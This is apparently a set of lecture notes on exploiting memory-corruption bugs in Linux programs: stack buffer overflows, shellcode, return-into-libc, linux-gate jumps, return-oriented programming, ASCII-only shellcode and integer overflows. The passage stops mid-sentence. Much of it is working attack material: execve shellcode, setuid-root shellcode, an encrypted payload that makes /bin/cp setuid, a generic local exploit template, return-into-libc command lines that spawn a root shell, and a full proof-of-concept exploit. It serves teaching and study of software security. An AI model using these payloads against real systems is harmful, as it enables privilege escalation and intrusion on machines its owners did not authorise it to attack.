A special case of the use of active data is the buffer overflow. A decent programmer proves to himself on every single array access that the index is within bounds. But many people are lazy and just allocate the arrays "sufficiently large" without ever checking for overflow. Usually it is possible to crash such programs presenting them with sufficiently large data.
Typically one invokes them with
% foo `perl -e 'print "A"x5000'`(that is, a string of 5000 A's). If the program crashes, then it is vulnerable. The A's overwrite something past the end of some array. If the array is local, that is, allocated on the stack, then, on machines on which the stack grows downwards, this overwrites the return address of this subroutine, and the program jumps to some random place and crashes.
The long string can come from a command line argument, from stdin, from an environment variable, etc.
Once a vulnerable program has been found, we redo the experiment, this time with a carefully chosen string instead of just a lot of A's. If we overwrite the return address of the subroutine, making it point at the array, then, when the subroutine returns, it jumps into the array, and executes what was written there.
(Again nostalgia - we did something very similar in 1971, on the Algol system of the X8, to take control of the machine and make it talk to its PDP8 neighbour.)
We need to know the architecture of the machine to write the right machine instructions, and there may be special difficulties because for example the string cannot contain NULs or nonprinting characters or so, and we must know the operating system, but usually it is possible to write suitable code to make the program do whatever we want. If the program is conversational, maybe we want an interactive shell.
Of course, all of this is only useful when the program has capabilities that we do not have ourselves. Either because it runs on a machine we do not have access to, or because it is setuid root or so.
The classic paper on this topic is Smashing The Stack For Fun And Profit by Aleph One. It is so clear and explicit that there is very little to add. Let us do some exercise.
Exercise Find a vulnerable program, not necessarily setuid. Make it spawn a shell.
Let me record an example.
% zile `perl -e 'print "A"x5000'` Zile crashed. Please send a bug report to <sandro@sigala.it>. Trying to save modified buffers (if any)...
(The terminal was left in a funny state, cleaned up by reset
followed by Ctrl-j (linefeed, not Enter).)
OK. Now that we can crash it, we can overflow the stack in a more controlled way. The first few attempts fail, and closer investigation shows that the argument is regarded as a pathname, and is picked apart into directory and filename, and then combined again. All three buffers have length 4096. We have best control over what happens when the overflow only happens at this combining stage. So, make the shellcode start with '/' instead of NOP, then the first half is directory, the second half is filename, and combined they overflow the pathname array. The resulting code is almost identical to that of Aleph One. Now
% ./egg3a 4150 12000 % zile $EGG sh-2.05b$ TERM=xterm reset<ctrl-j> sh-2.05b$
Success! (The call of egg3a
puts EGG
in the
environment and spawns a new shell. That shell execs zile
with a very long command line argument. The buffer overflow in
zile
is now exploited and gives a third shell, with
different prompt since the environment, and in particular PS1
,
was not copied. Giving Ctrl-D twice brings us back in the original shell.)
Of course zile
is not setuid root, so this was only playing.
In hundreds of situations this technique gives a break-in, both
locally and remotely.
Problem Find all local setuid programs, e.g. by
% find / -type f -perm +06000What do they do? Why are they setuid? Can any of these be crashed by using long input strings, file names, environment variables, resource names, etc.? Can any of these be broken into?
The paper The Frame Pointer Overwrite by klog shows that an off-by-one error may suffice to get a working exploit. (Instead of overwriting the return address one overwrites the frame pointer, which later gets moved into the stack pointer, so that the next function return will pop a chosen value from the stack as new EIP.)
Shellcode is the name for strings that code some function, like spawning a shell, The code must be compact and self-contained, so that it can be used in e.g. buffer overflow exploits.
Lots of special purpose shellcodes have been developed for all imaginable systems and architectures. Examples can be found many places, such as on antifork.org and shellcode.org (defunct) and www.shellcode.com.ar.
Let us look at a
very small example
(Linux on i386).
Shellcode: j\x0bX\x99Rhn/shh//bi\x89\xe3RS\x89\xe1\xcd\x80
.
6a 0b push $0xb # 11: execve 58 pop %eax 99 cltd 52 push %edx 68 6e 2f 73 68 push $0x68732f6e # n/sh 68 2f 2f 62 69 push $0x69622f2f # //bi 89 e3 mov %esp,%ebx 52 push %edx 53 push %ebx 89 e1 mov %esp,%ecx cd 80 int $0x80 # system call
A Linux system call is done using the instruction int $0x80
,
with the system call number in the EAX register, and the parameters
in EBX, ECX, EDX, ... In this case we want to do an execve()
call.
The prototype is
int execve(char *name, char *argv[], char *envp[]);and we are going to construct the call
execve("/bin/sh", argv, NULL);
where argv
is a pointer to an array of two elements,
namely "/bin/sh", NULL
.
The first two instructions put 11 (the number of execve
) in EAX.
The third instruction extends the 32-bit integer EAX to the 64-bit
integer EDX,EAX, that is, sets EDX to -1 if EAX is negative and to 0
otherwise. Here EDX is cleared. The next four instructions push
"//bin/sh"
on the stack (with terminating 0) and assign
the address of this string to EBX. The next three instructions
construct the array of two elements and assign its address to ECX.
Then the system call is done. The string can be tested by the conventional
char shellcode[] = "j\x0bX\x99Rhn/shh//bi\x89\xe3RS\x89\xe1\xcd\x80"; main() { long *ret; ret = (long *)&ret + 2; (*ret) = (long)shellcode; }(The pointer
ret
is set to point to the return address
of main()
, two 4-byte integers higher on the stack,
and the address of the shellcode is written there,
so that main()
returns into the shellcode.)
Here an optimizing compiler might optimize the entire body away,
so it is better to use e.g.
main() { int (*ret)(); ret = shellcode; ret(); }
Aleph One already explained how to construct shellcode. Here another tutorial.
Let us give one more example. A setuid program can drop privileges
temporarily, and we would like to have full privileges when
a shell is spawned (or some other interesting action is performed).
So we want to restore privileges first, and setresuid(0,0,0)
does that. Then let us change our program /tmp/.x
to be
setuid root.
int main() { setresuid(0,0,0); chown("/tmp/.x", 0, 0); chmod("/tmp/.x", 04755); exit(0); }
We do not want to go through libc, so want the bare system calls. Insert the corresponding macros.
#include <linux/unistd.h> _syscall3(int,setresuid,int,r,int,e,int,s) _syscall3(int,chown,char*,f,int,u,int,g) _syscall2(int,chmod,char*,f,int,m) _syscall1(int,exit,int,r)Also insert a declaration for
errno
since that is used
by these syscall
macros.
int errno;Now compile and look at the result.
% cc -S sc.c % cat sc.s ... setresuid: pushl %ebp movl %esp, %ebp // standard procedure entrance pushl %ebx // save register subl $4, %esp // space for temp movl $164, %eax movl 8(%ebp), %ebx movl 12(%ebp), %ecx movl 16(%ebp), %edx int $0x80 movl %eax, -8(%ebp) // store result in temp cmpl $-126, -8(%ebp) // compare with -126 jbe .L3 // below or equal? movl -8(%ebp), %eax // no, an error code negl %eax movl %eax, errno // put it in errno movl $-1, -8(%ebp) // and return -1 .L3: movl -8(%ebp), %eax addl $4, %esp popl %ebx ret ...
The int $0x80
is the system call, and the four instructions
in front just set up the call. Before that there is a standard
procedure entrance (save frame pointer, set new frame pointer,
save register, reserve space for temp). What is all this stuff afterwards?
It is the handling of error returns. When the return value is
in the range [-125,-1] it is the negative of an error value,
and the error value is stored in errno
, and -1 is
returned. Otherwise the system call return value is returned unchanged.
Discard everything except for the actual call.
Our assembly becomes
setresuid: movl $164, %eax movl $0, %ebx movl $0, %ecx movl $0, %edx int $0x80 chown: movl $182, %eax movl $.name, %ebx movl $0, %ecx movl $0, %edx int $0x80 chmod: movl $15, %eax movl $.name, %ebx movl $04755, %ecx int $0x80 exit: movl $1, %eax movl $0, %ebx int $0x80 .name: .string "/tmp/.x"Try whether this really works. Put it inside a C program and run.
int main() { asm( " movl $164, %eax \n" ... " int $0x80 \n" ".name: .string \"/tmp/.x\" \n" ); }Compile and run, and yes - this works.
% ls -l /tmp/.x -rwxr-xr-x 1 aeb 666 2004-04-01 19:25 /tmp/.x % cc -o sc sc.c % su # ./sc -rwsr-xr-x 1 root 666 2004-04-01 19:25 /tmp/.x
Now look at the generated code.
% objdump -d ./sc ... 0804831c <setresuid>: 804831c: b8 a4 00 00 00 mov $0xa4,%eax 8048321: bb 00 00 00 00 mov $0x0,%ebx 8048326: b9 00 00 00 00 mov $0x0,%ecx 804832b: ba 00 00 00 00 mov $0x0,%edx 8048330: cd 80 int $0x80 08048332 <chown>: 8048332: b8 b6 00 00 00 mov $0xb6,%eax 8048337: bb 65 83 04 08 mov $0x8048365,%ebx 804833c: b9 00 00 00 00 mov $0x0,%ecx 8048341: ba 00 00 00 00 mov $0x0,%edx 8048346: cd 80 int $0x80 08048348 <chmod>: 8048348: b8 0f 00 00 00 mov $0xf,%eax 804834d: bb 65 83 04 08 mov $0x8048365,%ebx 8048352: b9 ed 09 00 00 mov $0x9ed,%ecx 8048357: cd 80 int $0x80 08048359 <exit>: 8048359: b8 01 00 00 00 mov $0x1,%eax 804835e: bb 00 00 00 00 mov $0x0,%ebx 8048363: cd 80 int $0x80 08048365 <.name>: 8048365: 2f 74 6d 70 2f 2e 78 00
Lots of NUL bytes. No good if we want to put this into a string
used to overflow a buffer. Let us replace each
mov $0,R
by xor R,R
.
And replace the 4-byte moves of small values by single byte or
2-byte moves. This yields
31 c0 xorl %eax,%eax b0 a4 movb $0xa4,%al 31 db xorl %ebx,%ebx 31 c9 xorl %ecx,%ecx 31 d2 xorl %edx,%edx cd 80 int $0x80 31 c0 xorl %eax,%eax b0 b6 movb $0xb6,%al bb ?? ?? ?? ?? movl $.name,%ebx 31 c9 xorl %ecx,%ecx 31 d2 xorl %edx,%edx cd 80 int $0x80 31 c0 xorl %eax,%eax b0 0f movb $0xf,%al bb ?? ?? ?? ?? movl $.name,%ebx 31 c9 xorl %ecx,%ecx 66 b9 ed 09 movw $0x9ed,%cx cd 80 int $0x80 31 c0 xorl %eax,%eax 40 inc %eax 31 db xorl %ebx,%ebx cd 80 int $0x80 .name: 2f 74 6d 70 2f 2e 78 00
Much smaller, and no NULs. The only problem is that if we
run this code in some random context, the address of .name
will be something unknown. Three solutions: (i) put this string
at some known address, (ii) push the string on the stack,
(iii) find out where we are in memory and compute the address
of .name
.
For a local attack approach (i) works, even though it is a bit clumsy:
put FN=/tmp/.x
in the environment, and then ask for the address
of this string. Note that the address will go down by 2 each time the
length of the program name is increased by 1.
In the 23-byte shell code above we saw approach (ii). Let us do (iii) here.
The standard approach is to put a JMP to the end at the start of the shell code, and a CALL to just after the JMP at the end of the shell code. That CALL will put our current address on the stack. (The JMP is just to get a CALL with a negative offset, since a small positive offset would give an instruction containing a NUL.)
eb 2c jmp .call .begin: 31 c0 xorl %eax,%eax b0 a4 movb $0xa4,%al 31 db xorl %ebx,%ebx 31 c9 xorl %ecx,%ecx 31 d2 xorl %edx,%edx cd 80 int $0x80 31 c0 xorl %eax,%eax b0 b6 movb $0xb6,%al 5b pop %ebx 53 push %ebx 31 c9 xorl %ecx,%ecx 31 d2 xorl %edx,%edx cd 80 int $0x80 31 c0 xorl %eax,%eax b0 0f movb $0xf,%al 5b pop %ebx 31 c9 xorl %ecx,%ecx 66 b9 ed 09 movw $0x9ed,%cx cd 80 int $0x80 31 c0 xorl %eax,%eax 40 inc %eax 31 db xorl %ebx,%ebx cd 80 int $0x80 .call: e8 cf ff ff ff call .begin .name: 2f 74 6d 70 2f 2e 78 00
Suppose one finds the shell code
"\x2b\xc9\x83\xe9\xf2\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x70" "\xce\x9d\x91\x83\xeb\xfc\xe2\xf4\x1a\xc5\xc5\x08\x22\xa8\xf5\xbc" "\x13\x47\x7a\xf9\x5f\xbd\xf5\x91\x18\xe1\xff\xf8\x1e\x47\x7e\xc3" "\x98\xda\x9d\x91\x70\xad\xf5\xfc\x1f\xaa\xbd\xa1\x44\xf9\xa8\xa4" "\x50\xe1\xff\xf8\x1e\xe1\xfe\xe1\x70\x99\xce\x18\x91\x03\x1d\x91"- what does it do? Put it in a small C program and disassemble to get
00000000 <sc>: 0: 2b c9 sub %ecx,%ecx 2: 83 e9 f2 sub $0xfffffff2,%ecx 5: d9 ee fldz 7: d9 74 24 f4 fnstenv 0xfffffff4(%esp) b: 5b pop %ebx c: 81 73 13 70 ce 9d 91 xorl $0x919dce70,0x13(%ebx) 13: 83 eb fc sub $0xfffffffc,%ebx 16: e2 f4 loop c <sc+0xc> 18: 1a c5 sbb %ch,%al 1a: c5 08 lds (%eax),%ecx 1c: 22 a8 f5 bc 13 47 and 0x4713bcf5(%eax),%ch 22: 7a f9 jp 1d <sc+0x1d> 24: 5f pop %edi 25: bd f5 91 18 e1 mov $0xe11891f5,%ebp 2a: ff (bad) ...The start looks reasonable, but soon it becomes garbage. First we set ECX to -14. Then we do a harmless floating point instruction. Then we store the 28-byte FPU environment at the address ESP-12. Bytes 12-15 of this environment are the address of the last floating point instruction, that is, of the fldz, and that address is now written to top of stack, and popped into EBX. (Above we used a
call
to get an address on the stack.
This is trickier: the combination fldz
, fnstenv
will probably defeat single stepping in most debuggers.)
Then follows a loop that XORs the next 14*4 bytes with the constant
0x919dce70. Aha, that explains the garbage. We have to decrypt,
and then find
18: 6a 0b push $0xb 1a: 58 pop %eax 1b: 99 cltd 1c: 52 push %edx 1d: 66 68 2d 63 pushw $0x632d ; -c 21: 89 e7 mov %esp,%edi 23: 68 2f 73 68 00 push $0x68732f ; /sh 28: 68 2f 62 69 6e push $0x6e69622f ; /bin 2d: 89 e3 mov %esp,%ebx 2f: 52 push %edx 30: e8 14 00 00 00 call 49 <sc+0x49> 35: 63 68 6d 6f 64 20 30 34 37 35 35 20 2f 62 69 6e 2f 63 70 00 ; chmod 04755 /bin/cp 49: 57 push %edi 4a: 53 push %ebx 4b: 89 e1 mov %esp,%ecx 4d: cd 80 int $0x80In other words, the system call
execve("/bin/sh",["/bin/sh","-c","chmod 04755 /bin/cp",0],0)
is done. Note that this part may contain NULs since they were XORed
earlier. Of course the construction is completely general:
the string can contain arbitrary shell commands, and is encrypted
so that the function of the shell code is not immediately obvious.
In order to apply the buffer overflow in more general situations, it helps to know the precise memory layout of the program being attacked. Below some Linux details (for the i386 architecture).
The stack looks as follows. First of all, on almost all architectures, it grows downward, from high addresses to low addresses. On i386 the stack pointer points at the most recent byte pushed. On the stack we meet (from high to low addresses):
NULL program name environment strings argv strings platform string ELF Auxiliary Table NULL that ends envp[] environment pointers NULL that ends argv[] argv pointers argc stack from startup code envp argv argc return address of main saved registers of main local variables of main ...Details depend a bit on the compiler and (g)libc version used, whether the binary is a.out or ELF, whether is was compiled statically or uses dynamic libraries, etc.
Exercise Write a C program that prints out the stack. Try to explain what you find.
An easy variation on the theme of buffer overflow was described by
Murat Balaban in
bof-eng.txt.
Fork off the vulnerable utility with an environment containing
only one environment variable, where that single variable contains
the shell code. Now we know precisely where the shell code starts,
namely at 0xbffffffa - strlen(program_name) - strlen(shell_code)
.
(The reason that we have 0xbffffffa
instead of 0xc0000000
is that there are two closing NULs and a final 4-byte NULL.)
The buffer overflow can just overwrite the buffer with copies
of this address. The typical local exploit now looks somewhat like
#define BUFSZ 500 #define ALIGNMENT 0 #define PATH "/path/to/vulnerable/utility" char shellcode[]="..my_favorite_shellcode.."; char buf[BUFSZ]; int main() { char *env[2] = {shellcode, NULL}; int ret = 0xbffffffa - strlen(shellcode) - strlen(PATH); int i, *p = (int *)(buf + ALIGNMENT); for (i = 0; i+4 < BUFSZ; i += 4) *p++ = ret; return execle(PATH, PATH, buf, NULL, env); }
Note that some systems use a random variation in the location
of top-of-stack (say, 0xc0000000
minus a small amount),
and this spoils this easy direct approach.
Note that some systems use an entirely different top-of-stack
(say, 0xff000000
).
Buffer overflows have been found by the thousands, and instead of fixing every individual vulnerable program people have tried to come up with general protections.
Some protection against these kinds of exploits is provided by Solar Designer's non-executable stack patch, see also here.
However, some more ingenuity produces other exploits in the category of buffer overflows. After all, the main ingredient is that the overflow overwrites the return address of the current function, and if the stack is not executable then the shellcode must be somewhere else. See for example Solar Designer's article Getting around non-executable stack, and Nergal's Defeating Solar Designer non-executable stack patch.
On 2003-05-02, Ingo Molnar released his exec-shield that is a superversion of Solar Designer's non-executable stack patch. On Linux systems protected in this way it is much harder to perform the usual kind of buffer overflow exploit. (But see below.) Here a writeup of some common protection measures.
What if we are on a system with non-executable stack? Or a system that carefully distinguishes between data and instructions, so that our data will not be executable? Then the return address must be overwritten with an address of our choice that points at executable code that was present already.
The standard trick is to use the system()
libc library call.
We'll do a system("/bin/sh")
call.
Make the return address point at system()
, and prepare the stack
so that this routine finds its argument on the stack. We need the addresses
of system()
and "/bin/sh"
and (for a clean exit)
of exit()
.
First find the addresses of system()
and exit()
in libc:
% cat > fa.c extern int system(), exit(); main() { printf("system: 0x%08x\n", system); printf("exit: 0x%08x\n", exit); } ^D % cc -o fa fa.c % ./fa system: 0x080482a0 exit: 0x080482d0Hm. Libc lives around 0x40000000, but here we get 0x08000000 type addresses. Try again with
gdb
:
% gdb fa (gdb) p system $1 = {<text variable, no debug info>} 0x80482a0 (gdb) break main Breakpoint 1 at 0x80483a2 (gdb) run Starting program: /home/aeb/ctest/fa Breakpoint 1, 0x080483a2 in main () (gdb) p system $2 = {<text variable, no debug info>} 0x4006d4b0 <system> (gdb) p exit $3 = {<text variable, no debug info>} 0x40057fb0 <exit> (gdb) qAha. The library addresses are 0x4006d4b0 and 0x40057fb0 and the procedure linkage table (.plt) addresses are 0x080482a0 and 0x080482d0.
Less primitive is to use dlsym()
. E.g.,
% cat > fa2.c #include <stdio.h> #include <dlfcn.h> main() { void *h, *p; h = dlopen(NULL, RTLD_LAZY); p = dlsym(h, "system"); printf("0x%08x\n", p); p = dlsym(h, "exit"); printf("0x%08x\n", p); } ^D % cc -o fa2 fa2.c -ldl % ./fa2 0x400704b0 0x4005afb0
Help! Different addresses. Why?
% ldd ./fa libc.so.6 => /lib/i686/libc.so.6 (0x4002c000) /lib/ld-linux.so.2 => /lib/ld-linux.so.2 (0x40000000) % ldd ./fa2 libdl.so.2 => /lib/libdl.so.2 (0x4002c000) libc.so.6 => /lib/i686/libc.so.6 (0x4002f000) /lib/ld-linux.so.2 => /lib/ld-linux.so.2 (0x40000000) % python >>> 0x400704b0-0x4002f000 267440 >>> 0x4006d4b0-0x4002c000 267440 >>>OK. So, when we exploit a program, we must do an
ldd
to
find out where the libraries are, and then system
has
an offset of 267440 from the start of libc (on this machine here).
Of course the offset depends on the library version (and on the compiler
used to compile the library). This is not a big problem. In almost all
cases libc comes from some Linux distribution, probably a known
distribution, and we can investigate the libc for that distribution,
and also the ldd
output for the target program for that
distribution.
Then "/bin/sh"
. Either put it in an environment variable
and find the address, or find the existing copy in libc.
E.g.,
% cat > fa1.c main(){ char *p; p = 0x4002c000; while (1) { while (*p++ != '/') ; if (strcmp(p-1, "/bin/sh") == 0) { printf("0x%08x\n", p-1); return 0; } } } ^D % cc -o fa1 fa1.c % ./fa1 0x40151439That was the preparation: on this system we have
system
,
exit
and "/bin/sh"
with offsets
267440, 180144, 1201209 from the start of libc.
Now for the exploit. When a function is called, one first pushes
the parameters, and the last instruction is the call
instruction,
and it pushes the return address.
So, at entrance, the function expects on the stack a return address followed
by the parameters.
If we write the three words (i) address of system
,
(ii) address of exit
, (iii) address of "/bin/sh"
on the stack in such a way that part (i) overwrites the return
address of the function, then the ret
of the function
will jump to system
, and we'll do a system("/bin/sh")
,
and afterwards return to the address of exit
. Neat.
So, this is a precise exploit: we must know precisely where to write, that is, we must know how far the return address is from the start of the buffer that we overflow. Let us try an example.
% cat > vuln.c int main(int argc, char **argv) { char buff[30]; if (argc == 2) strcpy(buff, argv[1]); return 0; } ^D % cc -o vuln vuln.c % ./vuln aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa Segmentation fault % ./vuln `perl -e 'print "A"x44 . "\xb0\xd4\x06\x40" . "\xb0\x7f\x05\x40" . "\x39\x14\x15\x40"'` sh-2.05b$
Yes. So this works.
(More generally, this stuff with NOP sledge and guessing is only needed for a remote exploit where we don't know precisely where things are in memory. In a Linux environment, usually no guessing is needed.)
The above worked and all is well for an exploit where the invoker of the vulnerable program is root. Perfect for the remote exploit of some daemon that runs as root. But what about local exploits of some vulnerable setuid root binary?
# chown root vuln # chmod 04555 vuln % ./vuln `perl -e 'print "A"x44 . "\xb0\xd4\x06\x40" . "\xb0\x7f\x05\x40" . "\x39\x14\x15\x40"'` sh-2.05b$ id uid=500(aeb) ...
Ach. This shell drops privileges. I get a shell prompt, but not a
root shell prompt. Useless for local exploits.
We would like to do setuid(0)
first.
That would work if we could put the sequence
setuid | system | 0 | "/bin/sh"on the stack, but that is not so easy. (Here,
setuid
uses the argument 0
, and returns to
system
which uses the argument "/bin/sh"
and
then crashes because we left out the exit
this time.)
Finding the addresses goes like before, but 0 is a bad value.
So, this will only get us some obscure user ID without NUL bytes.
Replacing "/bin/sh" by some other command does not help, because
it is the shell that is implicit in system()
that drops
privileges.
Then maybe we do not want to call system()
at all,
and instead do an execl()
of our favourite program
that starts with setuid(0)
. Like this
% cat > fav.c main() { setuid(0); execl("/bin/sh", "/bin/sh", 0); }We need a stack like
execl | xxx | fav | fav | 0and again there is the problem with getting the 4-byte 0.
A beautiful trick uses printf
with the %n
format, just like we used for format exploits.
Use a stack like
printf | execl | "%3$n" | fav | fav | hereNow the function return will jump to
printf
which
will write 0 to where its third argument points, but it
points to itself, and here
is overwritten by 0
.
Then fav
is executed, and we never return here.
A good plan. Ingredients needed: library addresses of printf
and execl
, we know how to find those. Next, the address
of the format string, and of the name of our favourite program
"/tmp/fav"
. Probably not found in libc.
Put them in the environment, and find the address.
Finally, the address here
. Good that we have open source.
Insert a print statement in the source of vuln.c
to find that. Let us try:
% getlibcaddr printf 0x4007cab0 % getlibcaddr execl 0x400d8390 % export FMT="%3$n" % export FAV="/tmp/fav" % ln getenvaddr ./genv % ./genv FMT 0xbfffff2d % ./genv FAV 0xbffffce3 % ed vuln.c 140 3a printf("0x%08x\n", buff); . w vulx.c 167 q % cc -o vulx vulx.c % ./vulx 0xbffff530 % perl -e 'printf("0x%08x\n", 0xbffff530 + 44 + 20)' 0xbffff570 % ./vuln `perl -e 'print "A"x44 . "\xb0\xca\x07\x40" . "\x90\x83\x0d\x40" . "\x2d\xff\xff\xbf" . "\xe3\xfc\xff\xbf" . "\xe3\xfc\xff\xbf" . "\x70\xf5\xff\xbf"'` sh-2.05b#
Success at first attempt. Note that addresses depend on the environment and on the length of the program name, so we first set up the desired environment, then look for addresses, and make sure that we do the looking with programs that have a name of the same length as the program to be exploited.
This was an example of returning into libc that assumed that libc addresses do not contain NUL bytes. If they do one may try to use .plt addresses, or jump to places or functions in the vulnerable executable instead of to libc. For a detailed discussion, see Nergal's paper in Phrack 58.
Recent Linux systems randomize addresses in at least two ways.
On the one hand at startup the starting address of the stack is
given a random offset. On the other hand, the return values of
the mmap()
system call are made random.
For testing and debugging purposes people need reproducible setups, and this randomization can be switched off.
% grep stack /proc/self/maps bf97f000-bf995000 rw-p bf97f000 00:00 0 [stack] % grep stack /proc/self/maps bfdd3000-bfde9000 rw-p bfdd3000 00:00 0 [stack] # echo 0 > /proc/sys/kernel/randomize_va_space % grep stack /proc/self/maps bffeb000-c0000000 rw-p bffeb000 00:00 0 [stack] % grep stack /proc/self/maps bffeb000-c0000000 rw-p bffeb000 00:00 0 [stack](Writing 0 to
/proc/sys/kernel/randomize_va_space
turns off randomization globally. On older Fedora systems
one has /proc/sys/kernel/exec-shield{-randomize}
.
One can use setarch
or some private utility
to set the ADDR_NO_RANDOMIZE personality bit on program startup
to turn off randomization for a single program invocation.)
Unfortunately, the ADDR_NO_RANDOMIZE bit is cleared when a setuid binary is started.
Also this is a serious obstacle for the usual buffer overflow exploits. But, see below.
linux-gate.so.1
If randomization of the stack address is defeated by returning
into libc, then the next step in the defense is to randomize
library addresses. Fortunately, Linux has one library that is
generated by the kernel, common for all processes, always mapped at
0xffffe000, called linux-gate.so.1
. In
Neworder's
newsletter13.txt
izik describes how to make use of it.
Let the dummy vulnerable program be
/* va-vuln-poc.c */ #include <string.h> int main(int argc, char **argv) { char buf[256]; strcpy(buf, argv[1]); return 1; }
Exploit it using
/* * va-exploit-poc.c, Exploiting va-vuln-poc.c * under VA patch (Proof of Concept!) * - izik@tty64.org */ #include <stdio.h> #include <string.h> #include <stdlib.h> #include <unistd.h> char shellcode[] = "\x6a\x0b" // push $0xb "\x58" // pop %eax "\x99" // cltd "\x52" // push %edx "\x68\x2f\x2f\x73\x68" // push $0x68732f2f "\x68\x2f\x62\x69\x6e" // push $0x6e69622f "\x89\xe3" // mov %esp,%ebx "\x52" // push %edx "\x53" // push %ebx "\x89\xe1" // mov %esp,%ecx "\xcd\x80"; // int $0x80 unsigned long find_esp(void) { int i; char *ptr = (char *) 0xffffe000; for (i = 0; i < 4095; i++) { if (ptr[i] == '\xff' && ptr[i+1] == '\xe4') { printf("* Found JMP %%ESP @ 0x%08x\n", ptr+i); return (unsigned long) ptr+i; } } return 0; } int main(int argc, char **argv) { char evilbuf[295]; char *evilargs[] = { "./va-vuln-poc", evilbuf , NULL }; unsigned long retaddr; retaddr = find_esp(); if (!retaddr) { printf("* No JMP %%ESP in this kernel!\n"); return -1; } memset(evilbuf, 0x41, sizeof(evilbuf)); memcpy(evilbuf+268, &retaddr, sizeof(long)); memcpy(evilbuf+272, shellcode, sizeof(shellcode)); execve("./va-vuln-poc", evilargs, NULL); return 1; }
The main program first finds a jmp %esp
instruction
in the current kernel's linux-gate.so.1
. It gives up
when no such instruction is found. Otherwise it does a precision
exploit, overwriting the return address on the stack with the
address of a jmp %esp
, and putting the shellcode after that.
A beautiful construction.
Let us try here. Hmm - due to compiler details the return address is found 4 bytes earlier. Change the above 268, 272 into 264, 268 and a shell is spawned.
Unfortunately, nowadays also linux-gate.so.1
is loaded
at a random address.
(On my i386. Also on my x86_64.
But not on the latter machine in 32-bit mode...)
If the target system is protected in such a way that no location
that is writable also is executable, then one has to depend on
the code that is already there.
As a generalization of the return into libc or into linux-gate.so.1
one has "Return-oriented programming". Find many fragments of code
consisting of one or two useful instructions followed by a ret
.
Chain them together by having a list of addresses of such fragments
prepared on the stack. Each ret
will jump to the next fragment.
For a nice description, see Nergal's
Phrack 58#4.
(Of course, instructions with an effect similar to that of ret
will do as well.)
This means that NX technology is no longer a strong protection.
ASLR (address space layout randomization) means that the pointers we use
cannot point to objects that have randomized addresses.
Maybe not to the stack, or to the environment, or to libc.
That still leaves the code of the exploited program itself.
Experience shows that every largish program has enough of these sequences
to write arbitrary code. So, also ASLR can be defeated.
Sometimes the shellcode used has to satisfy certain conditions, be all-ASCII or all-UTF8 or the result of encoding a URL. That makes designing an exploit more difficult but not impossible. Basic papers are Writing ia32 alphanumeric shellcodes by rix (p57-0x0f) and Building IA32 'Unicode-Proof' Shellcodes by obscou (p61-0x0b).
The NOP sledge uses NOP = 0x90, not printable. But there are lots of instructions that can be used instead, like @ = "inc %eax" or A = "inc %ecx" or H = "dec %eax". Thus, the NOP-sledge could be HAHAHAHA and include an @ if the string should look like an email address.
Roughly speaking, the most useful instructions that are ASCII bytes are
% | 0x25 | and %eax |
- | 0x2d | sub %eax |
5 | 0x35 | xor %eax |
@, A, B, C, D, E, F, G | 0x40-0x47 | inc R |
H, I, J, K, L, M, N, O | 0x48-0x4f | dec R |
P, Q, R, S, T, U, V, W | 0x50-0x57 | push R |
X, Y, Z, [, \, ], ^, _ | 0x58-0x5f | pop R |
a | 0x61 | popa |
f | 0x66 | operand size prefix |
g | 0x67 | address size prefix |
where R = %eax, %ecx, %edx, %ebx, %esp, %ebp, %esi, %edi.
One can clear %eax using two AND instructions
and $0x31313131, %eax and $0x46464646, %eax(that is, "%1111%FFFF"), construct any desired value in %eax using at most four SUB instructions, and push the result on the stack. For example, the value 0x12345678 is pushed by
sub $0x30304130, %eax sub $0x30307364, %eax sub $0x33317a7a, %eax sub $0x5a397a7a, %eax push %eax(that is, "-0A00-ds00-zz13-zz9ZP"), starting from a zero %eax. Thus, arbitrary code can be created. The stack pointer can be set to any value by popping into %esp. Thus, arbitrary code can be created anywhere one wants.
For a nice self-contained exploit one can try to set %esp to some value a little bit higher than the current eip, push the desired exploit, set %eax to 0x90909090 (4 NOPs), and finish with a long tail PPPPP.... (where each P pushes four NOPs, and the idea is that the tail of this ASCII shellcode walks over onto the NOP sledge of the just-constructed code.
If the current address is unknown, but we got there by some buffer overflow, then probably the last thing that happened was the return that used the overwritten return address, and we find our present location by something like
dec %esp dec %esp dec %esp dec %esp pop %ecxthat is the sequence "LLLLY".
Since there is a large number of different ways of writing a given number as a sum of four "printable" numbers, any exploit can be encoded in an ASCII-only exploit as above in many different ways. The typical structure with repeated subtracts can be avoided by using XOR. Etc.
Even if a utility is careful to check all lengths and sizes
it may be vulnerable. The reason is that one intuitively
reads code as if it talks about for example integers,
but in reality it is about int
s, and these are
quite different animals.
Properties of int
s:
They can be signed or unsigned. All arithmetic involving
unsigned ints is done modulo 2^32 (on a 32-bit machine).
Any comparison involving signed and unsigned integers is done
by first casting everything to unsigned int. The C sizeof()
operator returns an unsigned int.
As a result, the results of comparison, addition and multiplication may not be what one expected. Examples:
(1) In mathematics, and when working with signed integers, a < b is equivalent to a - b < 0, but this is false for unsigned integers (indeed, unsigned integers cannot be negative), so intuitively equivalent statements can have very different semantics.
Thus, if one wants to concatenate two strings of lengths len1
and len2
and store the result in the character array buf
,
then the test
if (len2 < sizeof(buf) - len1) ...is no good: if
len1
is a bit larger than sizeof(buf)
the right-hand side is a huge positive integer and the test will succeed.
(2) Arithmetic overflow causes surprises.
In the previous example, also the test
if (len1 + len2 < sizeof(buf)) ...can lead to problems since the sum of two numbers can be small while the numbers themselves are huge. Similar things occur with multiplication, e.g. when allocating a number of structs:
p = (struct foo *) malloc(n * sizeof(struct foo)); if (p == NULL) error; for (i = 0; i < n; i++) do_something_with(p[i]);Here, if for example
sizeof(struct foo)
is 256
and n
equals 16777217, then room for only a single struct
is allocated, and afterwards memory is overwritten.
(3) Casting changes interpretation.
Casting an int
to an unsigned int
changes
a negative value to a huge positive value. The cast can be explicit,
or happen because there is an unsigned somewhere in the expression,
or happen because of an assignment, or because of the implicit
assignment for a function call.
For example, the size parameter of strncpy()
is unsigned,
and the program
#include <string.h> int main() { char buf[4]; int i, n; n = sizeof(buf); i = -1; if (i < n) strncpy(buf, "ach", i); return 0; }will segfault (since
strncpy()
copies the string and then
pads with NULs up to the indicated length).
(3a) Truncation.
Casting or assignment can change the length of a variable, so that it loses its most significant bits.
(4) Signedness.
In this same general area belong programming errors where the programmer just forgets that a variable may be negative.
In Jan 2005 it was noticed that in the Linux kernel,
file drivers/block/scsi_ioctl.c
there is the code
